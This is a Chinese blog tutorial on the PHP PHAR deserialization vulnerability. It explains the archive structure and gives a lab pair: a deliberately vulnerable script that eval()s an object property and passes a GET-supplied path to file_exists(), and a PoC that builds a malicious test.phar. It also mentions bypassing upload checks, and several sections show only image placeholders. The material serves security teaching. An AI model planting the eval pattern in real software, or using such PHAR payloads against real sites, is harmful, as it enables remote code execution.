PHAR反序列化漏洞

已于 2025-03-07 16:04:46 修改
阅读量1k 收藏 16
点赞数 14
分类专栏: 渗透测试 php反序列化 代码审计 文章标签: android php 反序列化漏洞 代码审计
于 2025-03-06 23:18:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/YhMjQx/article/details/146082745
版权

文章目录

PHAR反序列化漏洞

一、PHAR反序列化

PHAR指("Php ARchive”)是PHP里类似于JAR的一种打包文件,在PHP 5.3 或更高版本中默认开启,这个特性使得 PHP也可以像java -样方便地实现应用程序打包和组件化。一个应用程序可以打成一个Phar 包,直接放到 PHP-FPM 中运行。

我们一般利用反序列漏洞,一般都是借助unserialize()函数,不过随着人们安全的意识的提高这种漏洞利用越来越来难了,但是在2018年8月份的Blackhat2018大会上,来自Secarma的安全研究员Sam Thomas讲述了一种攻击PHP应用的新方式,利用这种方法可以在不使用unserialize()函数的情况下触发PHP反序列化漏洞。漏洞触发是利用Phar:/ 伪协议读取phar文件时,会反序列化meta-data储存的信息。

二、PHAR文件结构

1、stub

stub的基本结构: xxxx<?php __HALT_COMPILER();?>前面内容不限,但必须以__HALT_COMPILER();?>来结尾,否则phar扩展将无法识别这个文件为phar文件。

2、meta-data

phar文件本质上是一种压缩文件,其中每个被压缩文件的权限、属性等信息都放在这部分。这部分还会以序列化的形式存储用户自定义的meta-data,这里即为反席列化漏洞点。

3、content

被压缩文件的内容。

4、signature

签名,放在文件末尾。

三、PHAR工作原理

1、php.ini 中修改 phar.readonly = Off 并重启

image-20240905144635297

image-20240905145826420

2、编写以下PHP代码并命名为phar.php

当执行 file_exists($filname) 这句代码时,会自动进行序列值的反序列化

<?php
//正常的PHP后台执行代码,注意需要使用file_exists函数触发
class User {
    var $name;
    function __destruct(){
        @eval($this->name);
        //echo $this->name;
    }
}
$filname = $_GET['filename'];
file_exists($filname);
?>

3、编写test.phar的POC并命名为pharpoc.php

<?php

class User {
    var $name;
    public function __construct()
    {
        $this->name = "phpinfo();";
    }
}

@unlink("test.phar");  #如果已经存在 test.phar 文件,则删除该文件
$phar = new Phar("test.phar");  //然后重新创建一个Phar的文件对象,并命名为 test.phar 
$phar->startBuffering();  // 开启
$phar->setStub("<?php __HALT_COMPILER(); ?>");  //插入标志语,,用于标志这是一个phar文件
$o = new User();
$phar->setMetadata($o);  // 自己定义除文件信息之外的的需要被序列化的值,这一步会自动执行序列化操作
$phar->addFromString("test.txt","content");  //给test.phar 文件下添加文件test.txt
$phar->stopBuffering();

?>

4、访问第三步的pharpoc.php生成test.phar文件,再访问phar.php

访问pharpoc.php生成test.phar文件

image-20240905160325133

再访问phar.php

image-20240905160352252

5、以下函数可用于触发反序列化

image-20240905151401577

四、利用PHAR绕过文件上传检测

image-20240905151401577

利用PHAR协议进行PHP反序列化攻击1
08-03
在某些网络安全竞赛(如[CISCN2019华北赛区 Day1 Web1]Dropbox)中,攻击者可能利用PHAR反序列化漏洞来实现文件读取或执行其他操作。例如,通过上传一个伪装成图片的PHAR文件,然后更改其后缀,使得PHP尝试解析它。...
phar反序列化漏洞
csjjjd的博客
01-27 1505
基础:Phar是一种PHP文件归档格式,它类似于ZIP或JAR文件格式,可以将多个PHP文件打包成一个单独的文件(即Phar文件)。打包后的Phar文件可以像普通的PHP文件一样执行,可以包含PHP代码、文本文件、图像等各种资源,也可以对Phar文件进行签名、压缩和加密,我们还可以在文件包含中使用phar伪协议,可读取.phar文件。phar文件格式:stub.phar 文件标识,格式为xxx; manifest 压缩文件的属性等信息,以序列化存储;
php(phar)反序列化漏洞及各种绕过姿势
MrWangisgoodboy的博客
04-14 6073
概念:序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。简单来说就是我在一个地方构造了一个类,但我要在另一个地方去使用它,那怎么传过去呢?于是就想到了序列化这种东西,将对象先序列化为一个字符串(数据),后续需要使用的时候再进行反序列化即可得到要使用的对象,十分方便。来看看怎么说:所有php里面的值都可以使用函数来返回一个包含字节流的字符串来表示。函数能够重新把字符串变回php原来的值。序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。
php反序列化漏洞——phar反序列化漏洞
m0_73756016的博客
04-01 1472
类比java语言JAR是开发Java程序一个应用,包括所有的可执行、可访问的文件,都打包进了一个JAR文件里使得部署过程十分简单。PHAR("Php ARchive")是PHP里类似于JAR的一种打包文件对于PHP 5.3 或更高版本,Phar后缀文件是默认开启支持的,可以直接使用它。文件包含:phar伪协议,可读取 .phar文件。
php归档格式:phar文件详解(创建、使用、解包还原提取)
云客的技术博客【云游天下 做客四方】
02-10 1万+
一个php应用程序往往是由多个文件构成的,如果能把他们集中为一个文件来分发和运行是很方便的,这样的列子有很多,比如在window操作系统上面的安装程序、一个jquery库等等,为了做到这点php采用了phar文档文件格式,这个概念源自java的jar,但是在设计时主要针对 PHP 的 Web 环境,与 JAR 归档不同的是Phar 归档可由 PHP 本身处理,因此不需要使用额外的工具来创建或使用,
codecept.phar
09-23
codecept.phar 测试程序,移动该文件至 存放php 根目录中 存放 php.exe的地方 创建: codecept.bat 输入: ``` @php "%~dp0codecept.phar" %* ``` 使用说明:...
composer.phar
02-03
composer.phar composer.phar composer.phar composer.phar
泛微E-Office10远程代码执行漏洞
05-06
攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的反序列化机制来触发远程代码执行。成功利用这一漏洞的攻击者可以执行服务器上的任意代码,从而获得服务器的控制权限。在最糟糕的情况下,这...
php反序列化漏洞(万字详解)
永不落的梦想
07-26 6759
php反序列化万字文章详解,非常全面,并结合实际案例易于理解,包括pop链、字符串逃逸、session反序列化phar反序列化、原生类的利用以及各种绕过方式。
学习phar反序列化(看不懂别忍着,直接喷)
一剑开天门!的博客
01-13 224
学习phar反序列化(看不懂别忍着,直接喷)
第二十三天 phar反序列化漏洞
代码审计
04-01 2262
关于这个方法在2018年 BlackHat 大会上的 Sam Thomas 分享了 File Operation Induced Unserialization via the “phar://” Stream Wrapper ,该研究员指出该方法在 文件系统函数 ( file_get_contents 、 unlink 等)参数可控的情况下,配合 phar://伪协议 ,可以不依赖反序列化函数 unserialize() 直接进行反序列化的操作。 zip rar压缩文件包 类似 默认支持phar协议的使
Phar反序列化漏洞原理
soldi_er的博客
06-08 651
文章目录   来自Secarma的安全研究员Sam Thomas发现,可以在不使用php函数unserialize()的前提下,引起严重的php对象注入漏洞。   
phar 反序列化本地测试
3569
10-24 797
https://xz.aliyun.com/t/2715 看了上边的文章,然后根据他的代码来复现的。   众多文件操作函数能反序列化在于使用了 phar_parse_url,之后有调用到 phar_var_unserialize。 生成 phar代码:  test.txt随便写就行,没必要真实存在 &lt;?php class TestObject { } $...
序列化和反序列化漏洞的简单理解
热门推荐
jameson_的专栏
06-28 2万+
1 背景 2015年11月6日,FoxGlove Security安全团队的@breenmachine 发布的一篇博客[3]中介绍了如何利用Java反序列化漏洞,来攻击最新版的WebLogic、WebSphere、JBoss、Jenkins、OpenNMS这些大名鼎鼎的Java应用,实现远程代码执行。 然而事实上,博客作者并不是漏洞发现者。博客中提到,早在2015年的1月28号,Gabriel
反序列化漏洞 (2)------php 反序列化漏洞 ----- session反序列化问题,phar,pop,绕过__wakeup()
Z_Grant的博客
11-19 1631
文章目录一、漏洞简述php反序列化漏洞又称对象注入二、漏洞利用过程(1) 绕过__wakeup()的限制三、Session反序列化漏洞(1) Session序列化机制PHP处理器的三种序列化方式:配置文件 php.ini 的说明 一、漏洞简述php反序列化漏洞又称对象注入 原理:在php反序列化的时候,反序列化的内容可控,那么恶意用户就可以构造特定序列化内容的代码,通过unserialize()函...
RGCMS2.0存在phar反序列化漏洞
最新发布
02-22
Phar反序列化漏洞是一种严重的安全风险,在某些情况下允许攻击者执行任意代码。对于RGCMS 2.0而言,该版本可能存在处理用户输入不当的情况,特别是在文件上传或路径操作过程中未能充分验证数据合法性[^1]。 当应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值